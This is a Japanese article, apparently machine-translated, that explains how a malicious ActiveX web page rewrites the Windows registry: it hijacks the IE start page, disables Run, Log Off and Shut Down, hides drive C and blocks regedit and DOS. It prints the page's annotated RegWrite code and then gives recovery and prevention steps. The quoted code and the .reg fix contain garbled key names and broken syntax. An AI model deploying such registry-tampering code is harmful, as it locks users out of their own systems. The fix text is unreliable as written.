ホームページのレジストリをブラウズして修正された謎と解決方法
ホームページを閲覧するとレジストリが変更されますか?確かです下のページを見たことがあるなら:http://www.○○com/default.httm、あなたは本当に生より死の感じがあります!このページに入ると、1.変更開始メニュー1)「システムを閉じる」ことを禁止する2)「実行」を禁止する3)「ログアウト」を禁止する2.Cディスクを隠します――あなたのディスクが見つからない3.レジストリエディタregeditを使用禁止する4.DOSプログラムを使用することを禁止する5.システムを「実モード」に入れられない6.任意のプログラムを実行することを禁止する7IEブラウザのトップページをhttp://www.○○com/は、お気に入りにもURLが追加されています。これらの機能の恐怖の機能はどうやって実現されますか?このページはJava技術を利用して有害なコードを含むActiveXページのファイルを作成した人がいます。より多くの人に危害を理解させるために、そのソースコードを調べて、その主要な部分を列記して、詳しい注釈を加えました。下記のコードはあなたのIEをデフォルトの接続トップページに変更します。http://www.○○com/Shl.RegWrite(「HKCU\Software\Microsoft\Internet Explorer\Main\Start Page」、「http://www.○○com/「」;注:次のページは、被害者のレジストリ項目を修正するための技Shl.RegWrite(「HKCU\Software\Microsoft\Windows\Curent Version\Policies\Explorer\NoRun」、01、「REG_」です。BINARY");注:被害者システムに「実行」項目がないと、ユーザーはレジストリエディタを通じてこの有害ページのシステムレジストリに対する修正を修正できません。Shl.RegWrite(「HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoClose」、01、「REG_」BINARY");注:被害者システムに「システムを閉じる」項目のShl.RegWriteがないようにする(「HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NologOff」、01、「REG_」BINARY");注:被害者システムに「ログアウト」項目のShl.RegWrite(「HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoDrives」、「00004」、「REG_」がないようにする。DWORD");注:被害者システムを論理ドライバCShl.RegWrite(「HKCU\Software\Microsoft\Windows\Curent Version\Policies\WinOldAp\Displed」、「REG_BINARY");注:すべてのDOSアプリケーションを実行してはいけません。Shl.RegWrite(「HKCU\Software\Microsoft\Windows\Current Version\Policies\WinOldAp\NoRealMode」、「REG_BINARY");注:システムを「実モード」(従来のDOSモード)に起動できないようにします。また注:このページに入ると、以下のレジストリ項目を修正して、Windows\Current Version\Winlogon\LegalNortCaptionを表示します。注:これらのコードはウィンドウのタイトルを「ブラ…」とします。Shl.RegWrite(「HKLM\Software\Microsoft\Windows\Current Version\Win logon\Legal NoticeText」、「ようこそ!この超無敵の大ばか!物語は始まって、確定的に悲惨な世界に入ります。注:上記の行はウィンドウに表示される文字注:次の2行のコードはレジストリを修正し、被害者のすべてのIEウィンドウに以下のタイトルを付けます。Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","うわさ...")上記の行までに被害者に対するレジストリのすべての修正が完了しました。注:次のコードは被害者のお気に入りにウェブページを追加するために使用されます。WF=FSS.Get Special Folder(0)loc=WF+\\Favorites;if(FSF.FolderExists(loc){FSF=GetDrive Name(WF)+“\Dockments and Settings\”+Net.UserName+“\Favorites”;if(FSF.FolderExists(loc){return;}下記はお気に入りの具体的なコードAddFavLnkにホームページを追加します。http://www.○○com「」;;コードが簡単なので、コメントを入れました。もう分かりました。もしこのページに不注意で入ったら、もう募集しました。どうすればいいですか?焦らないでください。次は解決方法を示します。被害者ユーザの修復方法:1:Win 9 xユーザに対して、コンピュータの起動時にF 8ボタンを押してMS-DOS方式に選択することを提案しています。Screag/restrateコマンドを使用して、以前のバックアップされた正常なレジストリを回復します。2:Win 2000ユーザーに対して、以下の内容のcopyを降りて、unlock.regファイルとして保存し、コマンドライン付きのセキュリティモードを選択して、コマンドregedit unlock.regで導入して、どのようにマシンを再起動すればいいですか?unlock.regファイルの内容は以下の通りです。Windows Registry Editor Version 5.00[HKEY_]CURRENT_US ER\Software\Microsoft\Windows\Current Version\Policies\Explorer]「NoDrive Type AutoRun」=dword:0000095「NoRun」=hex:「NoLogOff」=hex:「NoDrives」=dword:0000「RestritRun」=0000CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System""DisplaleRegistryTools=dword:0000[HKEY_]CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System""DisplaleRegistryTools=dword:0000[HKEY_]CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\WinOldApp]「Displad」=dword:0000[HKEY_]CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\WinOldApp]「NoRealMode」=dword:0000[HKEY_]LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currenent Version\Winlogon"、"Legal NoticeCaption"="""""Legal NoticeText"=""[HKEY_]LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]「Window Title」=「IEブラウザ」[HKEY_]CURRENT_USER\Software\Microsoft\Internet Explorer\Main]「Window Title」=「IEブラウザ」予防方法:1.中技を避けるには、自分の知らないサイトに簡単に行かないことがポイントです。2.IEの設定ではActiveXプラグインとコントロール、Javaスクリプトなどはすべて禁止されています。3.最新のウイルスライブラリにアップグレードすることで、このような悪意のあるページの侵害を防ぐことができます。4.このページはレジストリを修正してシステムを破壊するので、レジストリをロックしておくことができます。レジストリを変更することを禁止して、予防の目的を達成することができます。でも、自分でレジストリエディタのregedit.exeを使いたいですが、どうすればいいですか?そのために、前に「鍵」を用意しておきます。これを開けます。ロックのかけ方は以下の通りです。(1)レジストリエディタregedit.exeを実行します。(2)レジストリをHKEY_に展開するCURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Systemの下で、Dispable RegistryToolsというDWORD値を新たに作って、その値を“1”に変更すれば、レジストリエディタregedit.exeを使用することを禁止できます。ロック解除方法は以下の通りです。メモ帳で任意の名前のregファイルを編集します。例えば、unlock.reg。内容は以下の通りです。REGEDIT 4[HKEY_]CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System""DisplaleRegistryTools=dword:0000メモリディスク。あなたはロック解除の鍵を持っています。レジストリエディタを使用する場合は、unlock.regをダブルクリックします。注意したいのは、「REGEDIT 4」の後に必ず一行を空けてください。そして、「REGEDIT 4」の中の「4」と「T」の間にはスペースがないといけません。説明:「万花谷」のサイトの悪意のあるコードによる破壊は、上記の方法で予防することもできます。また、KV 3000は「万花谷」に対して完全に回復し、本論文で紹介したウェブページの破壊システム現象に対しては、安全に回復することができない。